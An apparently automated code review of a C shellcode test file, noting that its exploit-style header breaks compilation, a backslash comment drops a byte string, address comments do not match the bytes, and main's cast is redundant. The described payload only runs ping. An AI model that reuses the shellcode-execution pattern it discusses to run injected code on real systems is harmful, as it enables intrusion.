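Review bot: The `# Title:` through `# Shellcode Size:` lines at the top of the file are parsed as preprocessor directives, and `# Title` is not a valid one, so the file as committed does not compile; they belong inside the `/* ... */` block that starts just below them. The `// C:\` comment inside the `code[]` initializer ends in a backslash, which splices the following line into the comment (GCC reports this under -Wcomment) and silently drops the next string literal from the array; drop the trailing backslash or write it as `/* C:\ */`. The `// 127.1.1.1` annotations also disagree with the bytes they label: `\x31\x37\x32` is `172`, so either the two comments and the `ping 127.1.1.1` description line or the bytes are wrong. In `main`, `(int)(*func)();` casts the result to int only to discard it, and `argc`/`argv` are unused; `(void)func();` with `int main(void)` states the intent.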